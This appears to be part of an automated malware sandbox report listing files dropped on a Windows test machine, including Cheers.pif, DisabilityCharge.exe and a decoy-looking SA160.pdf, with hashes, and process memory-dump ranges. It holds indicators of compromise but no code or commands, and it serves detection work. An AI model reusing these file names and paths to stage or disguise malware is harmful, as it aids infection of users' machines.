SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\5139075\Cheers.pifFilesize
872KB
MD56ee7ddebff0a2b78c7ac30f6e00d1d11
SHA1f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
SHA256865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
SHA51257d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\5139075\Cheers.pifFilesize
103B
MD59fb8e634ff869eec8cb42ab7af0b6fb5
SHA1d7553a9bb0e28264e33ae55fd9f472b4b64370ba
SHA256610a3efda69516655dd03cfc7d26224b2efe35934521af69fd9e96421fe1f3df
SHA51276edab533503200b549171988f355176ba80a3976dc1ed3c74578b1da858fefd50bdc9bdee0418d4fa4543f7630a7b78fce7da758217627f71b2bd15fc773422
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\5139075\MFilesize
867KB
MD5b18b385dc3c027bc4cd4362e23677edc
SHA165b09d44a81ca8528cf472f91e783a5199411f45
SHA256c43b8b1a8b8ab1455009a1463c77166c87d21b5ded408a9b9d2eb91213e783de
SHA51266889a43e26f37bd4ea756719c07e389c2292a2b971f7367c6779d63ba1de82f5509e62dbb5ab994b4d5e819614cb8a2051b21a7e7d5197e2067054314baa46e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\AnatomyFilesize
268KB
MD53d0fe94011bfc11f960f3692773becf6
SHA1eda278f584c80b7a5ec1a48c16c1453fd79d30fe
SHA256f1e2acd5399b8fd82a7d3be16aba6cf70dd4f5fea82211979b89e6293b736e85
SHA5124f15232e5966d2c024e929de468a4ff427d5ec714b15c3a19c55ce6c03342f01a4dd9784672aa3a4ec738db9c926727fc0108d36d751f2669b27837470bce0d8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\CapFilesize
152KB
MD5d7b3e4a1f20444dd37b4ef305b6f8199
SHA1bfd1d1bdff7c9d7e1ab6b46399252e94bbab8258
SHA256b64c28e45770c23ba7b4cc1b80efd0edafaa0ad8109d3c9e340b45ae40565929
SHA51224e83d25a23170f0d5c5f9f2afac13e72c017c98e443014e82a7b1b5a3a7aa9aafdfd795517e0a2b93bae2f742809c6a9e0627669c73dc3a8a0b57e9b2b8663a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\ChurchFilesize
113KB
MD5b020ac666f105e582800755e46b87e54
SHA133c9afc7390f7fefe0b11ee2f9e32f8107d5ec21
SHA2561713e9701d98f06a20391a048b2f5cb213b0ccf23f45df39df3cdbd55b23935c
SHA5120d6c163717bef8e894cdf95b619ac1d7728bc1b88a2485606b1f2270d5c683caab7c4d693f467ec89d83a7ae34ca4e1afad1df3a7d25e8a7fc750826a89a59b9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\CingularFilesize
262KB
MD55b18970d8c464ca95ef183c6eddf2c79
SHA130f9ef49ce58ded149dd60a32359052c7fda6b25
SHA25653a87d85121c6e590a928d3fae1f72ab3c266c980cc6a89f39cd74a2127d6b1e
SHA5122f636bb7527a194467ce15046d9bf1368fca37a9b160c22aeb022a1c15a0c6cbf978373fb6d59ac692c9e7de37310c9fcc9f26c1c1d54ecace41f94ccc5fedbe
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\CustomsFilesize
239KB
MD54c4ea6968e54f5f5c4c254587fee63dc
SHA1d21927f93dfb1626405cf09f3379d6bc7dd8a505
SHA2563a6b764666b1675287f39a952e072fcd41332b4d0ce2b4e59a96aa5a27af8707
SHA5128b3f479dd3accfffe0235f2a3e102c306c288788d533ae78f9b8d8bbd95f36a4a613f6c1c1f2443566e17971c6116274b8b901b83608a6189e4d4927e47e42b0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\DominicanFilesize
137KB
MD53c699f1767c677adfed1c113de6d184f
SHA1ca15988fb3c81b6b4e0d7c5914e0bb2e07b35d1b
SHA256740648b4a35012828dc95ef4258677d80659d820461ccfc9f98216facf0fea9a
SHA5129ba925d63f2f9c0dbb244d6cea56d4bfd0b39de973e9c68c743ef6a1014c2a72b93072606af17bc770a837320c3cf8dc5f51976389cd599922c7b668d263c2af
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\ObservedFilesize
25KB
MD5ad5b9509809e2c43efd8e4e0cbb697aa
SHA1440d24a228fd1a0b125d535e55b887713b237f37
SHA256eb882bf341c37bcd1c625e156f33db1b338d0e435aa074fa379cc3e73d6d9dad
SHA512553bf92ac85b4b5ce9605fd0630e9f0396f282ece3f2cd4c0741cfd2b29acdb2246c7df749b0ae6d0d7cd3327f0fd34588ab205659f7cdd91a43e92b34dcd695
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\OnsFilesize
140B
MD561bab20dd66e4690943a6165fd4ff9ca
SHA101237b42f749d18c2529aa6233349ecc5de29db2
SHA2564dab1074edd81fc8d7b5c1e989b025f96ff09ae42e58934668bcc2f696a167c9
SHA5129419cde00c25107d5ea4dd683b43d437fb508b951f5d7fbe919169724218b8bb13f2e91b3068f7a31433c3b899e9ae26e18cf94f9a9468ac5624efaa8c8f2ed2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\PlacingFilesize
247KB
MD5b68df1f6cc55a943bd8bd6a1ba4baeb2
SHA1ed2f9c007bef6a9e8d52aba49704b56c9babea6d
SHA256fdd8a7a40fdee48bd3a93b70e27c8efbb1aa860e2f7f587e1eecacbee3d6dd68
SHA5120f622f1d33bcbe46483fa9f578eaa845e49c3617d6f0c76f46d2a32bf33e350a74bb44b4b0c43ddb25fa9f808de763d49f2af37072748b3f98010a8eb6ded273
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\SoftwareFilesize
101KB
MD5722238ba226d0e01df25a8d6e95d609f
SHA12f5e912ff0660bdc3f85ccf6d61bcb10fab8edef
SHA25600559112065d90d8ba296b46949907ea4141c19323e999670a918bd50c5ae162
SHA5123200e2063b157198c62a69fce4435d1c139c6e7b7f00e0a8e0d05fb0bf54fc886adeea0a2a4e4e8ec055ae0c94eabb1867e6d019920aade7ccef33e91e3be042
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\TypingFilesize
220KB
MD5f0c0d7aff4f13ac8f3c247cb9fca2943
SHA194b642aa412319f2bfd814fefefa1b66c9fd7cc7
SHA2562e933f3194ac2649b3f2c3f0289174b787ef71314143d63980b4d0c3ca698582
SHA51236f1296f06acccfb3d621aaaf60ea24b354633568b0a946b2f2239e0e61f62dac2f6c418f1b9d2512572b308f176eeb657d479e1448bc330c63b9b01ae585b39
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5voe0aqd.04a.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\DisabilityCharge.exeFilesize
934KB
MD57def16e0ceea0ad69d53e0e636541dd9
SHA192080bb5ad272cf69f69aa0588856cda4b4b1c28
SHA25635ed65d9919843300db648bf93ae57d7330095eb1ce18d6c6050db88a2e4f297
SHA5129616fb69ed3fd6d59ae060a671c5af86f0d7e1a4e6f8436a9c7244928a2bb1f0a76ec4f1968f77180141493c16a4e1090faf8786ead929c3bd3812f2e09e596a
-
C:\Users\Admin\AppData\Roaming\SA160.pdfFilesize
290KB
MD5267489e084b08204ba4f32a865f2afec
SHA17c77753e748b3fc0a1e26687032bbbf575021d91
SHA256449e7d4fef2f0a11f5ccc0698a36d05fbac682791ca6b3ffaafa4605533e6553
SHA5129e0a516257a6491093d05b01bc7d654cacd1fff7be0024d7260e49b7a2edd6afe8a36d3f95815111e294916f0212c5236f1560e67355750da5c80fc7bfc1c6b6
-
memory/1392-107-0x000000000A0B0000-0x000000000A0D1000-memory.dmpFilesize
132KB
-
memory/1392-207-0x000000000B2D0000-0x000000000B57B000-memory.dmpFilesize
2.7MB
-
memory/1544-15-0x00007FFCD1C30000-0x00007FFCD26F1000-memory.dmpFilesize
10.8MB
-
memory/1544-11-0x000001D5B6DB0000-0x000001D5B6DC0000-memory.dmpFilesize
64KB
-
memory/1544-12-0x000001D5B6DB0000-0x000001D5B6DC0000-memory.dmpFilesize
64KB
-
memory/1544-9-0x000001D5D1460000-0x000001D5D1482000-memory.dmpFilesize
136KB
-
memory/1544-10-0x00007FFCD1C30000-0x00007FFCD26F1000-memory.dmpFilesize
10.8MB
-
memory/3644-231-0x00000000052A0000-0x000000000530D000-memory.dmpFilesize
436KB
-
memory/3644-239-0x00000000052A0000-0x000000000530D000-memory.dmpFilesize
436KB
-
memory/3644-255-0x00000000063B0000-0x00000000067B0000-memory.dmpFilesize
4.0MB
-
memory/3644-245-0x0000000076D20000-0x0000000076F35000-memory.dmpFilesize
2.1MB
-
memory/3644-242-0x00007FFCF0010000-0x00007FFCF0205000-memory.dmpFilesize
2.0MB
-
memory/3644-243-0x00000000063B0000-0x00000000067B0000-memory.dmpFilesize
4.0MB
-
memory/3644-223-0x0000000000D20000-0x0000000000D21000-memory.dmpFilesize
4KB
-
memory/3644-224-0x00000000052A0000-0x000000000530D000-memory.dmpFilesize
436KB
-
memory/3644-225-0x00000000052A0000-0x000000000530D000-memory.dmpFilesize
436KB
-
memory/3644-226-0x00000000052A0000-0x000000000530D000-memory.dmpFilesize
436KB
-
memory/3644-228-0x00000000052A0000-0x000000000530D000-memory.dmpFilesize
436KB
-
memory/3644-229-0x00000000052A0000-0x000000000530D000-memory.dmpFilesize
436KB
-
memory/3644-230-0x00000000052A0000-0x000000000530D000-memory.dmpFilesize
436KB
-
memory/3644-241-0x00000000063B0000-0x00000000067B0000-memory.dmpFilesize
4.0MB
-
memory/3644-238-0x00000000063B0000-0x00000000067B0000-memory.dmpFilesize
4.0MB
-
memory/3644-105-0x00000000777D1000-0x00000000778F1000-memory.dmpFilesize
1.1MB
-
memory/3644-240-0x00000000063B0000-0x00000000067B0000-memory.dmpFilesize
4.0MB
-
memory/4276-19-0x00007FFCD0BB0000-0x00007FFCD1671000-memory.dmpFilesize
10.8MB
-
memory/4276-20-0x0000015B37A30000-0x0000015B37A40000-memory.dmpFilesize
64KB
-
memory/4276-21-0x0000015B37A30000-0x0000015B37A40000-memory.dmpFilesize
64KB
-
memory/4276-43-0x0000015B37BB0000-0x0000015B37CFE000-memory.dmpFilesize
1.3MB
-
memory/4276-50-0x00007FFCD0BB0000-0x00007FFCD1671000-memory.dmpFilesize
10.8MB
-
memory/5116-246-0x00000000006E0000-0x00000000006E9000-memory.dmpFilesize
36KB
-
memory/5116-249-0x0000000002420000-0x0000000002820000-memory.dmpFilesize
4.0MB
-
memory/5116-248-0x0000000002420000-0x0000000002820000-memory.dmpFilesize
4.0MB
-
memory/5116-251-0x00007FFCF0010000-0x00007FFCF0205000-memory.dmpFilesize
2.0MB
-
memory/5116-254-0x0000000002420000-0x0000000002820000-memory.dmpFilesize
4.0MB
-
memory/5116-253-0x0000000076D20000-0x0000000076F35000-memory.dmpFilesize
2.1MB
-
memory/5116-256-0x0000000002420000-0x0000000002820000-memory.dmpFilesize
4.0MB